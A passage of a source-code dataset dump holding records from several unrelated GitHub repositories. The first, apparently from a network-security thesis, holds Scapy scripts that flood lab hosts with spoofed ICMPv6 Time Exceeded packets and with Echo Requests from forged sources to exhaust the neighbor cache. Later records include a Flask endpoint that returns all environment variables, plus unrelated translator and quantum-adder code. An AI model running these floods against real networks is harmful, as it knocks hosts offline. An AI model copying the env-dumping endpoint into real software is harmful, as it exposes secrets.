\"2001:abcd:acad:1::2\"\n self.firewall = \"2001:abcd:acad:2::1\"\n\n def execModuleTimeExceededBadCodeWin(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for code in range(2, 256):\n packetContainer = IPv6(dst=self.win,src=self.firewall)/ICMPv6TimeExceeded(code=code)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleTimeExceededBadCodeLinux(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for code in range(2, 256):\n packetContainer = IPv6(dst=self.linux,src=self.firewall)/ICMPv6TimeExceeded(code=code)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleTimeExceededHopLimitWin(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for x in range(0, 500):\n packetContainer = IPv6(dst=self.win,src=self.firewall)/ICMPv6TimeExceeded(code=0)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleTimeExceededHopLimitLinux(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for x in range(0, 500):\n packetContainer = IPv6(dst=self.linux,src=self.firewall)/ICMPv6TimeExceeded(code=0)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleTimeExceededFragmentReassemblyWin(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for x in range(0, 500):\n packetContainer = IPv6(dst=self.win,src=self.firewall)/ICMPv6TimeExceeded(code=1)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleTimeExceededFragmentReassemblyLinux(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for x in range(0, 500):\n packetContainer = IPv6(dst=self.linux,src=self.firewall)/ICMPv6TimeExceeded(code=1)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleTimeExceededLengthWin(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for x in range(0, 256):\n packetContainer = IPv6(dst=self.win,src=self.firewall)/ICMPv6TimeExceeded(code=0,length=x)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleTimeExceededLengthLinux(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for x in range(0, 256):\n packetContainer = IPv6(dst=self.linux,src=self.firewall)/ICMPv6TimeExceeded(code=0,length=x)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n \n" }, { "alpha_fraction": 0.5605846047401428, "alphanum_fraction": 0.6256482601165771, "avg_line_length": 35.568965911865234, "blob_id": "98420625e3ef734f98aa54fade77c73c4c9dd529", "content_id": "5381a5addfb44067817c14e662c9db9db0221c4a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2121, "license_type": "no_license", "max_line_length": 81, "num_lines": 58, "path": "/python/code/echoRequest.py", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nfrom scapy.all import *\n\n\n\n\"\"\"\nthe class build Echo Request messages\n\"\"\"\nclass EchoRequest:\n \n def __init__(self):\n print 'Echo Request'\n self.win = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\n self.linux = \"2001:abcd:acad:2:a00:27ff:fe84:bb37\"\n self.attacker = \"2001:abcd:acad:1::2\"\n self.firewall = \"2001:abcd:acad:2::1\"\n\n def buildPacketEchoRequest(self, dst, src):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n return IPv6(dst=dst,src=src)/ICMPv6EchoRequest()/data\n \n\n def execModuleEchoRequestNeighCacheExhaustionDstVictimWin(self, exitIface):\n start = 0x0001\n end = 0xffff\n for t in xrange(start, end):\n hex16 = '{:04x}'.format(t)\n src = \"2001:abcd:acad:2::\" + hex16[:4]\n packetContainer = self.buildPacketEchoRequest(self.win, src)\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleEchoRequestNeighCacheExhaustionDstVictimLinux(self, exitIface):\n start = 0x0001\n end = 0xffff\n for t in xrange(start, end):\n hex16 = '{:04x}'.format(t)\n src = \"2001:abcd:acad:2::\" + hex16[:4]\n packetContainer = self.buildPacketEchoRequest(self.linux, src)\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleEchoRequestNeighCacheExhaustionSrcVictimWin(self, exitIface):\n start = 0x0001\n end = 0xffff\n for t in xrange(start, end):\n hex16 = '{:04x}'.format(t)\n src = \"2001:abcd:acad:2::\" + hex16[:4]\n packetContainer = self.buildPacketEchoRequest(src, self.win)\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleEchoRequestNeighCacheExhaustionSrcVictimLinux(self, exitIface):\n start = 0x0001\n end = 0xffff\n for t in xrange(start, end):\n hex16 = '{:04x}'.format(t)\n src = \"2001:abcd:acad:2::\" + hex16[:4]\n packetContainer = self.buildPacketEchoRequest(src, self.linux)\n send(packetContainer, iface=exitIface, verbose=False)\n" } ]
27
cutterbuck/python-dictionaries-lab-data-science-pilot
https://github.com/cutterbuck/python-dictionaries-lab-data-science-pilot
0e3ac8dd966840f44c2dc8e97e772eeab5d5a6ec
bc7d582a5bd71b3aedbe95ea583c3e0b7c646ff6
673c66b6aaddfd131c554c6621fa01714d18e3ce
refs/heads/master
2020-03-10T08:59:51.016093
2018-04-12T19:02:10
2018-04-12T19:02:10
129,299,857
0
0
null
2018-04-12T19:13:00
2018-04-12T19:02:12
2018-04-12T19:02:11
null
[ { "alpha_fraction": 0.6485714316368103, "alphanum_fraction": 0.6785714030265808, "avg_line_length": 39, "blob_id": "5b622660dd63e31a45e77cc6814ded2096ef941b", "content_id": "6f2cad186e4266e4610fd70b4038bee56ad574bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1400, "license_type": "no_license", "max_line_length": 178, "num_lines": 35, "path": "/test_test.py", "repo_name": "cutterbuck/python-dictionaries-lab-data-science-pilot", "src_encoding": "UTF-8", "text": "import unittest2 as unittest\nfrom ipynb.fs.full.index import (greenville, greenville_population, area, city_keys, city_values, cities, salina, los_cabos_pop, city_count, pyeongchang_keys, pyeongchang_values)\n\nclass TestDictionary(unittest.TestCase):\n def test_greenville_population(self):\n self.assertEqual(greenville_population, 84554)\n\n def test_area(self):\n self.assertEqual(area, 68)\n\n def test_city_keys(self):\n self.assertEqual(city_keys, ['Area', 'City', 'Country', 'Population'])\n\n def test_city_values(self):\n self.assertEqual(city_values, [68, 'Greenville', 'USA', 84554])\n\n def test_salina(self):\n self.assertEqual(salina, {'Area': 27, 'City': 'Salina Island', 'Country': 'Italy', 'Population': 4000})\n\n def test_los_cabos_pop(self):\n self.assertEqual(los_cabos_pop, 287651)\n\n def test_city_count(self):\n self.assertEqual(city_count, 12)\n\n def test_change_spelling(self):\n self.assertEqual(cities[11]['City'], 'PyeongChang')\n\n def test_pyeongchang_keys(self):\n self.assertEqual(pyeongchang_keys, ['PyeongChang', 'South Korea', 2581000, 3194])\n self.assertEqual(type(pyeongchang_keys), type(list()))\n\n def test_pyeongchang_values(self):\n self.assertEqual(pyeongchang_values, ['City', 'Country', 'Population', 'Area'])\n self.assertEqual(type(pyeongchang_values), type(list()))\n" } ]
1
kissarat/miracle
https://github.com/kissarat/miracle
05fb4bcde34bdf11e01b60c89819f59aff21506c
d6e6db3307d6d108e33f76fc11966e15f08a8d63
02f2ec2bdcea5bfad584c291c74e417853e4143c
refs/heads/master
2023-05-24T23:25:22.584876
2020-08-01T20:54:30
2020-08-01T20:54:30
282,659,003
0
0
null
2020-07-26T13:47:25
2020-08-01T20:54:44
2023-05-01T21:44:45
Python
[ { "alpha_fraction": 0.5258711576461792, "alphanum_fraction": 0.5311509966850281, "avg_line_length": 27.696969985961914, "blob_id": "5fc010e51617b8561b96d4458748846e2ed43c9e", "content_id": "0a3e2db0165108e6dbbf2ce69080cbdb347d2f7a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 947, "license_type": "no_license", "max_line_length": 60, "num_lines": 33, "path": "/nodejs/index.js", "repo_name": "kissarat/miracle", "src_encoding": "UTF-8", "text": "const http = require('http');\nconst { name, version } = require('./package');\n\nlet started;\n\nconst server = http.createServer(function(req, res) {\n let bodySize = 0;\n req.on('data', function(chunk) {\n bodySize += chunk.byteLength;\n });\n req.on('end', function() {\n const time = new Date().toISOString();\n const json = {\n method: req.method,\n url: req.url,\n bodySize,\n time,\n headers: req.headers,\n env: process.env\n };\n res.setHeader('content-type', 'application/json');\n res.setHeader('server', `${name}/${version}`);\n res.setHeader('server-started', started);\n res.write(JSON.stringify(json, null, '\\t'));\n res.end(function() {\n console.log(`${time} ${req.method} ${req.url}`);\n })\n })\n});\n\nserver.listen(process.env.PORT || 8080, () => {\n started = new Date().toISOString();\n});\n" }, { "alpha_fraction": 0.600751519203186, "alphanum_fraction": 0.6176608800888062, "avg_line_length": 28.164382934570312, "blob_id": "c3049fd6edb0e77ee68c7bc764ac0d44ecb97493", "content_id": "00d76c6078b0a63e7861b32201277f600cd5b46b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2129, "license_type": "no_license", "max_line_length": 69, "num_lines": 73, "path": "/python/flask/datastore/main.py", "repo_name": "kissarat/miracle", "src_encoding": "UTF-8", "text": "# [START gae_python37_app]\nimport datetime\nimport logging\nimport socket\nimport time\nimport json\nfrom datetime import datetime\nfrom flask import Flask, request, Response\nfrom os import environ\nfrom google.cloud import datastore\nfrom base64 import b64decode\n\ndb = datastore.Client()\n\napp = Flask(__name__)\n\[email protected]('/<name>')\ndef index(name):\n id = int(round(time.time() * 1000))\n visit = datastore.Entity(db.key('visit-{}'.format(name), id))\n forwarded = request.headers.get('x-forwarded-for')\n if forwarded:\n visit['ip'] = forwarded.split(',')[0].strip()\n else:\n visit['ip'] = request.remote_addr\n location = request.headers.get('x-appengine-citylatlong')\n if location:\n [visit['latitude'], visit['longitude']] = location.split(',')\n city = request.headers.get('x-appengine-city')\n if city:\n visit['city'] = city\n visit['country'] = request.headers.get('x-appengine-country')\n visit['agent'] = request.headers.get('user-agent')\n url = request.args.get('url')\n if url:\n visit['url'] = b64decode(url).decode('utf-8')\n cid = request.args.get('cid')\n if cid:\n visit['cid'] = cid\n db.put(visit)\n result = dict(visit)\n result['id'] = id\n callback = request.args.get('callback')\n if callback:\n return Response(\n '{}({})'.format(callback, json.dumps(result)),\n mimetype='application/javascript',\n headers={\n 'access-control-allow-origin': '*'\n }\n )\n return result\n\[email protected](500)\ndef server_error(e):\n logging.exception('An error occurred during a request.')\n return \"\"\"\n An internal error occurred: <pre>{}</pre>\n See logs for full stacktrace.\n (Miracle server)\n \"\"\".format(e), 500\n\n\nif __name__ == '__main__':\n # This is used when running locally. Gunicorn is used to run the\n # application on Google App Engine. See entrypoint in app.yaml.\n port = environ.get('PORT')\n if port:\n port = int(port)\n else:\n port = 8080\n app.run(host='127.0.0.1', port=8080, debug=True)\n# [END gae_python37_app]\n" }, { "alpha_fraction": 0.6019323468208313, "alphanum_fraction": 0.6251207590103149, "avg_line_length": 22.522727966308594, "blob_id": "c40a9372ec562d8ea33899b569615906041d8292", "content_id": "99cf672e464daf66fa23c63329e6ee373dd50e64", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1035, "license_type": "no_license", "max_line_length": 68, "num_lines": 44, "path": "/python/flask/reflect-request/main.py", "repo_name": "kissarat/miracle", "src_encoding": "UTF-8", "text": "# [START gae_python37_app]\nimport datetime\nimport logging\nimport socket\nfrom datetime import datetime\nfrom flask import Flask, request\nfrom os import environ\n\nstated = datetime.now().isoformat()\n\n\napp = Flask(__name__)\n\n\[email protected]('/')\ndef index():\n return {\n \"ip\": request.remote_addr,\n \"method\": request.method,\n \"url\": request.url,\n \"headers\": dict(request.headers),\n \"env\": dict(environ)\n }\n\[email protected](500)\ndef server_error(e):\n logging.exception('An error occurred during a request.')\n return \"\"\"\n An internal error occurred: <pre>{}</pre>\n See logs for full stacktrace.\n (Miracle server)\n \"\"\".format(e), 500\n\n\nif __name__ == '__main__':\n # This is used when running locally. Gunicorn is used to run the\n # application on Google App Engine. See entrypoint in app.yaml.\n # port = environ.get('PORT')\n # if port:\n # port = int(port)\n # else:\n # port = 8080\n app.run(host='127.0.0.1', port=8080, debug=True)\n# [END gae_python37_app]\n" }, { "alpha_fraction": 0.7560975551605225, "alphanum_fraction": 0.7560975551605225, "avg_line_length": 12.666666984558105, "blob_id": "85c19438e7fc2d707bf1d7eb166896aacb1f3494", "content_id": "2171c0a06c2977ea8920798e59043454ea7b6699", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 41, "license_type": "no_license", "max_line_length": 27, "num_lines": 3, "path": "/README.md", "repo_name": "kissarat/miracle", "src_encoding": "UTF-8", "text": "Miracle\n====\nGoogle Cloud usage examples\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.7581967115402222, "avg_line_length": 21.18181800842285, "blob_id": "db94f4adcfa68d15155bf7e229b8710452d85956", "content_id": "b84c9b6b8b992e82e01251c5e9c101700ee3e0f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 244, "license_type": "no_license", "max_line_length": 42, "num_lines": 11, "path": "/python/flask/datastore/Dockerfile", "repo_name": "kissarat/miracle", "src_encoding": "UTF-8", "text": "FROM gcr.io/google-appengine/python\nRUN virtualenv /env -p python3.7\nENV VIRTUAL_ENV /env\nENV PATH /env/bin:$PATH\n\nADD requirements.txt /app/requirements.txt\nRUN pip install -r /app/requirements.txt\n\nADD . /app\n\nCMD gunicorn -b :$PORT main:app\n" } ]
5
Mithun-9792/translator
https://github.com/Mithun-9792/translator
e5bb848254e284aa0c86b5e86573be6b41c4106c
15d07c65948e5b67c5e402176cf13c7ace215f4c
b54d708298ffdd556353baf3ef054658a2dfa238
refs/heads/main
2023-08-04T09:04:17.745551
2021-09-17T17:16:17
2021-09-17T17:16:17
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5717234015464783, "alphanum_fraction": 0.5748193860054016, "avg_line_length": 22.274999618530273, "blob_id": "9ea52c45e7ac86d7229df7f67f7098c904a6ff14", "content_id": "49792d6317c201e29bd0c0a8cd9774d737e7149c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 969, "license_type": "no_license", "max_line_length": 63, "num_lines": 40, "path": "/translator.py", "repo_name": "Mithun-9792/translator", "src_encoding": "UTF-8", "text": "import pandas as pd\r\nimport pyttsx3 as pt\r\nimport speech_recognition as sr\r\nfrom googletrans import Translator\r\ntr = Translator()\r\n\r\ndef output(text):\r\n engine = pt.init()\r\n engine.say(text)\r\n engine.runAndWait()\r\n\r\n\r\ndef converter(words):\r\n translated_words = tr.translate(words).text\r\n print(\"In English: \", translated_words)\r\n output(translated_words)\r\n return\r\n\r\n\r\n\r\n\r\ndef takeCommandHindi():\r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print('Listening...')\r\n r.pause_threshold = 0.7\r\n audio = r.listen(source)\r\n try:\r\n print('Recognizing...')\r\n query = r.recognize_google(audio, language='hi-In')\r\n print(\"Your request is: '\", query,\"'\")\r\n converter(query)\r\n except Exception as e:\r\n print(e)\r\n print('Say that again sir...')\r\n return \"None\"\r\n return\r\n \r\ndef HindiToEnglish():\r\n takeCommandHindi()" }, { "alpha_fraction": 0.7674418687820435, "alphanum_fraction": 0.7674418687820435, "avg_line_length": 42, "blob_id": "17de34a233a8b26deb5eda721aee55ae4f1d4149", "content_id": "e71f77748bdac2ac6741558f6a2fb050252d7778", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 43, "license_type": "no_license", "max_line_length": 42, "num_lines": 1, "path": "/README.md", "repo_name": "Mithun-9792/translator", "src_encoding": "UTF-8", "text": "## Translator - Hindi to English Converter\n" }, { "alpha_fraction": 0.6232604384422302, "alphanum_fraction": 0.6272366046905518, "avg_line_length": 30.28125, "blob_id": "ee540080de6f4dfe37aa6dc4c1c5873e4e5d1e8a", "content_id": "b36a373a026fb877533ce37eecb80636a43ec18f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1006, "license_type": "no_license", "max_line_length": 83, "num_lines": 32, "path": "/languageconvert.py", "repo_name": "Mithun-9792/translator", "src_encoding": "UTF-8", "text": "from englisttohindi.englisttohindi import EngtoHindi\nimport speech_recognition as sr\nimport pyttsx3\nfrom googletrans import Translator\nr=sr.Recognizer()\ntranslator = Translator()\nwhile True:\n with sr.Microphone() as source:\n x=\"Let's start\"\n res = EngtoHindi(x)\n print(x)\n result = translator.translate(x, dest='hi')\n print(result)\n print(res.convert)\n pyttsx3.speak(res.convert)\n audio=r.listen(source)\n print(\"converting\")\n eng=r.recognize_google(audio)\n if ((\"close\" in eng) or (\"exit\" in eng) or (\"stop\" in eng)) and (\"app\" in eng):\n c=\"closed\"\n re = EngtoHindi(c)\n pyttsx3.speak(re.convert)\n result = translator.translate(c, dest='hi')\n print(result)\n break\n print(\"you spoke\",eng)\n hin=EngtoHindi(eng)\n print(\"this is how it is spoken in HIndi : \")\n result = translator.translate(eng, dest='hi')\n print(result)\n print(hin.convert)\n pyttsx3.speak(hin.convert)\n \n" }, { "alpha_fraction": 0.6020451784133911, "alphanum_fraction": 0.6058798432350159, "avg_line_length": 24.23655891418457, "blob_id": "4718c370b34f979f563598df9da0b5b70370b52c", "content_id": "bb4e0f4a7ddeac9eb9c9210b60bc319e4b3f85ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2347, "license_type": "no_license", "max_line_length": 115, "num_lines": 93, "path": "/findSubtitle.py", "repo_name": "Mithun-9792/translator", "src_encoding": "UTF-8", "text": "import time\nimport pandas as pd\nimport pyttsx3 as pt\nimport speech_recognition as sr\nfrom googletrans import Translator\nimport moviepy.editor as mp\ntr = Translator()\n\n\n# this function converts hindi into english\ndef converter(words):\n print('Translating text from hindi to english')\n translated_words = tr.translate(words).text\n print(\"In English: \", translated_words)\n output(translated_words)\n print('Saving the subtitles...')\n file = open('subtitle.txt', 'w')\n file.write(translated_words)\n file.close()\n print('Done')\n return\n\n\n\ndef output(text):\n engine = pt.init()\n \n # to set the rate of speaking\n engine.setProperty('rate',100)\n \n # to get the voices\n voices = engine.getProperty('voices')\n \n #female voice\n engine.setProperty('voice', voices[1].id)\n \n # to speak the text\n engine.say(text)\n \n # save the file in mp3 format\n engine.save_to_file(text, 'test.mp3') \n \n engine.runAndWait()\n\n\n\ndef startConvertion(path = 'my_result.wav',lang = 'hi-IN'):\n with sr.AudioFile(path) as source:\n print('Fetching Audio File...')\n r = sr.Recognizer()\n audio_text = r.listen(source)\n # recoginize_() method will throw a request error if the API is unreachable, hence using exception handling\n try:\n \n # using google speech recognition\n print('Converting audio transcripts into text ...')\n text = r.recognize_google(audio_text)\n print(text)\n\n # to convert the hindi text to english\n converter(text)\n \n except:\n print('Sorry.. run again...')\n query = input(\"Type 'yes' to start again\")\n if query == yes:\n subtitle()\n\n\n\ndef subtitle():\n # to take the file-name of video(only-name)\n video = input()\n\n try:\n # to get that video file from the storage\n print('Searching for the Video...')\n time.sleep(1)\n my_clip = mp.VideoFileClip(fr\"{video}.mp4\")\n\n # to retrieve the audio file from that video\n my_clip.audio.write_audiofile(r\"my_result.wav\")\n startConvertion()\n\n except OSError:\n print(\"Please try again file not found\")\n query = input(\"Type 'yes' to continue\")\n if query == 'yes':\n subtitle()\n\n\n\nsubtitle()\n" } ]
4
wxdlywy/nyasQuantumCalculate
https://github.com/wxdlywy/nyasQuantumCalculate
7730c97619b99f62d7eebb41c20ee2488a499ff9
0bf901302356168f61066d1037242036d6f416f8
771c45c2d3a5829dfc4d62fbd1660a60352a0674
refs/heads/main
2023-04-05T23:05:49.046039
2021-05-04T04:48:19
2021-05-04T04:48:19
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6546489596366882, "alphanum_fraction": 0.7229601740837097, "avg_line_length": 14.969696998596191, "blob_id": "862d6ee92712511bab7f052c162ba3cb0d933214", "content_id": "f06a564412816f3dd07155be37ac9e4a8bede86c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 527, "license_type": "no_license", "max_line_length": 34, "num_lines": 33, "path": "/examples/others/BreakDownCCNOT.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "from nyasQuantumCalculate import *\n\nqbsys = QubitsSystem(3)\nq0 = qbsys[0]\nq1 = qbsys[1]\nq2 = qbsys[2]\n\nBuiltin.H(q0)\nBuiltin.H(q1)\nBuiltin.CCNOT(q0, q1, q2)\nDumpSystemText(qbsys)\n\nBuiltin.H(q2)\nBuiltin.CNOT(q1, q2)\nBuiltin.S(q2)\nBuiltin.T(q2)\nBuiltin.CNOT(q0, q2)\nBuiltin.T(q2)\nBuiltin.CNOT(q1, q2)\nBuiltin.S(q2)\nBuiltin.T(q2)\nBuiltin.CNOT(q0, q2)\nBuiltin.T(q2)\nBuiltin.H(q2)\nBuiltin.T(q1)\nBuiltin.CNOT(q0, q1)\nBuiltin.T(q0)\nBuiltin.S(q1)\nBuiltin.T(q1)\nBuiltin.CNOT(q0, q1)\nDumpSystemText(qbsys)\n\nBuiltin.RA(qbsys.getQubits())\n" }, { "alpha_fraction": 0.5099678635597229, "alphanum_fraction": 0.5252411365509033, "avg_line_length": 26.64444351196289, "blob_id": "c53e4cb2445f61a5612eeb4513ced8f0fa67e0e4", "content_id": "ede5dd1566a259975c0050d2a430d17a68ba5e0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6800, "license_type": "no_license", "max_line_length": 75, "num_lines": 225, "path": "/nyasQuantumCalculate/HighLevel/Add.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom nyasQuantumCalculate.Options import *\nfrom nyasQuantumCalculate.Utils import *\nfrom nyasQuantumCalculate.System import *\nfrom nyasQuantumCalculate.Operate import *\n\n\n__all__ = [\"Adder\", \"PhaseAdd\", \"IPhaseAdd\",\"Add\", \"IAdd\",\n \"PhaseAddInt\", \"IPhaseAddInt\", \"AddInt\", \"IAddInt\"]\n\n\ndef Adder(Cin: Qubit, A: Qubits, B: Qubits, Cout: Qubit) -> None:\n \"\"\"基本加法器\n\n |Cin❭|A❭|B❭|Cout❭ -> |Cin❭|A❭|mod(A+B,N)❭|Cout⊕floor(A+B/N)❭; N = 2^n\n\n 注意: 使用可逆计算逻辑运行的加法器, 中途会新增n-1个Qubits, 确保有足够的内存\n\n Args:\n Cin: 进位输入\n A: 第一个加数, A和B的长度必须都为n\n B: 第二个加数, 加法结果会储存在这里\n Cout: 进位输出\"\"\"\n if Options.inputCheck:\n if not inSameSystem(Cin, A, B, Cout):\n raise ValueError(\"Input qubits are not in same system.\")\n if len(A) != len(B):\n raise ValueError(\"Length of A and B should be same.\")\n n = len(A)\n A_ = A if Options.littleEndian else A[::-1]\n B_ = B if Options.littleEndian else B[::-1]\n with TemporaryQubits(Cin.system, n - 1) as tmp:\n carries = Cin + tmp + Cout\n for index in range(n):\n q0 = carries[index]\n q1 = A_[index]\n q2 = B_[index]\n q3 = carries[index + 1]\n CCNOT(q1, q2, q3)\n CNOT(q1, q2)\n CCNOT(q0, q2, q3)\n CNOT(A_[-1], B_[-1])\n CNOT(carries[-2], B_[-1])\n CNOT(A_[-1], B_[-1])\n for index in range(n-2, -1, -1):\n q0 = carries[index]\n q1 = A_[index]\n q2 = B_[index]\n q3 = carries[index + 1]\n CCNOT(q0, q2, q3)\n CNOT(q1, q2)\n CCNOT(q1, q2, q3)\n CNOT(q0, q2)\n CNOT(q1, q2)\n\n\ndef PhaseAdd(A: Qubits, B: Qubits) -> None:\n \"\"\"把A作为相位加到B上\n\n Args:\n A: 加数, 长度为m\n B: 被加数, 长度为n, 并且n>=m\"\"\"\n if Options.inputCheck:\n if not inSameSystem(A, B):\n raise ValueError(\"Input qubits are not in same system.\")\n if len(A) > len(B):\n raise ValueError(\"Length of A should not be greater than B's.\")\n m = len(A)\n n = len(B)\n n_m = n - m\n RotationGates.updateRs(n)\n A_ = A[::-1] if Options.littleEndian else A\n B_ = B[::-1] if Options.littleEndian else B\n for index in range(n):\n A_start = max(0, index - n_m)\n B_start = max(0, n_m - index)\n B_end = n - index\n for ctlQb, target in zip(A_[A_start:], B_[B_start:B_end]):\n Controlled(RotationGates.Rs[index], ctlQb.asQubits(), target)\n\n\ndef Add(A: Qubits, B: Qubits) -> None:\n \"\"\"计算A+B\n\n |A❭|B❭ -> |A❭|mod(A+B,N)❭; N = 2^n\n\n Args:\n A: 加数, 长度为m\n B: 被加数, 长度为n, 并且n>=m\"\"\"\n if Options.inputCheck:\n if not inSameSystem(A, B):\n raise ValueError(\"Input qubits are not in same system.\")\n if len(A) > len(B):\n raise ValueError(\"Length of A should not be greater than B's.\")\n A_ = A[::-1] if Options.littleEndian else A\n B_ = B[::-1] if Options.littleEndian else B\n with TemporaryOptions.QFTswap(False):\n QFT(B_)\n with (TemporaryOptions.inputCheck(False),\n TemporaryOptions.littleEndian(False)):\n PhaseAdd(A_, B_)\n IQFT(B_)\n\n\ndef IPhaseAdd(A: Qubits, B: Qubits) -> None:\n \"\"\"计算PhaseAddd的逆\n\n Args:\n A: 加数, 长度为m\n B: 被加数, 长度为n, 并且n>=m\"\"\"\n if Options.inputCheck:\n if not inSameSystem(A, B):\n raise ValueError(\"Input qubits are not in same system.\")\n if len(A) > len(B):\n raise ValueError(\"Length of A should not be greater than B's.\")\n m = len(A)\n n = len(B)\n n_m = n - m\n RotationGates.updateiRs(n)\n A_ = A[::-1] if Options.littleEndian else A\n B_ = B[::-1] if Options.littleEndian else B\n for index in range(n):\n A_start = max(0, index - n_m)\n B_start = max(0, n_m - index)\n B_end = n - index\n for ctlQb, target in zip(A_[A_start:], B_[B_start:B_end]):\n Controlled(RotationGates.iRs[index], ctlQb.asQubits(), target)\n\n\ndef IAdd(A: Qubits, B: Qubits) -> None:\n \"\"\"计算A+B的逆\n\n |A❭|A+B❭ -> |A❭|mod(B,N)❭; N = 2^n\n\n Args:\n A: 加数, 长度为m\n B: 被加数, 长度为n, 并且n>=m\"\"\"\n if Options.inputCheck:\n if not inSameSystem(A, B):\n raise ValueError(\"Input qubits are not in same system.\")\n if len(A) > len(B):\n raise ValueError(\"Length of A should not be greater than B's.\")\n A_ = A[::-1] if Options.littleEndian else A\n B_ = B[::-1] if Options.littleEndian else B\n with TemporaryOptions.QFTswap(False):\n QFT(B_)\n with (TemporaryOptions.inputCheck(False),\n TemporaryOptions.littleEndian(False)):\n IPhaseAdd(A_, B_)\n IQFT(B_)\n\n\ndef PhaseAddInt(A: int, B: Qubits) -> None:\n \"\"\"把A作为相位加到B上\n\n Args:\n A: 加数, 长度小于等于n, 否则会被截断\n B: 被加数, 长度为n\"\"\"\n n = len(B)\n tag0 = 1 << n\n tag1 = tag0 - 1\n a_ = A & tag1\n B_ = B[::-1] if Options.littleEndian else B\n tag0 >>= 1\n for qb in B_:\n R1(a_ / tag0 * pi)(qb)\n tag1 >>= 1\n tag0 >>= 1\n a_ &= tag1\n\n\ndef AddInt(A: int, B: Qubits) -> None:\n \"\"\"计算A+B\n\n |B❭ -> |mod(A+B,N)❭; N = 2^n\n\n 因为加数不是量子位, 使用化简算法\n\n Args:\n A: 加数, 长度小于等于n, 否则会被截断\n B: 被加数, 长度为n\"\"\"\n B_ = B[::-1] if Options.littleEndian else B\n with TemporaryOptions.QFTswap(False):\n QFT(B_)\n with TemporaryOptions.littleEndian(False):\n PhaseAddInt(A, B_)\n IQFT(B_)\n\n\ndef IPhaseAddInt(A: int, B: Qubits) -> None:\n \"\"\"计算PhaseAddInt的逆\n\n Args:\n A: 加数, 长度小于等于n, 否则会被截断\n B: 被加数, 长度为n\"\"\"\n n = len(B)\n tag0 = 1 << n\n tag1 = tag0 - 1\n a_ = A & tag1\n B_ = B[::-1] if Options.littleEndian else B\n tag0 >>= 1\n for qb in B_:\n R1(a_ / tag0 * -pi)(qb)\n tag1 >>= 1\n tag0 >>= 1\n a_ &= tag1\n\n\ndef IAddInt(A: int, B: Qubits) -> None:\n \"\"\"计算A+B的逆\n\n |A+B❭ -> |mod(B,N)❭; N = 2^n\n\n 因为加数不是量子位, 使用化简算法\n\n Args:\n A: 加数, 长度小于等于n, 否则会被截断\n B: 被加数, 长度为n\"\"\"\n B_ = B[::-1] if Options.littleEndian else B\n with TemporaryOptions.QFTswap(False):\n QFT(B_)\n with TemporaryOptions.littleEndian(False):\n PhaseAddInt(A, B_)\n IQFT(B_)\n" }, { "alpha_fraction": 0.5356047749519348, "alphanum_fraction": 0.5508233904838562, "avg_line_length": 31.732341766357422, "blob_id": "f58d783b1752ca021f1dcda0c22ff8c13bbb240f", "content_id": 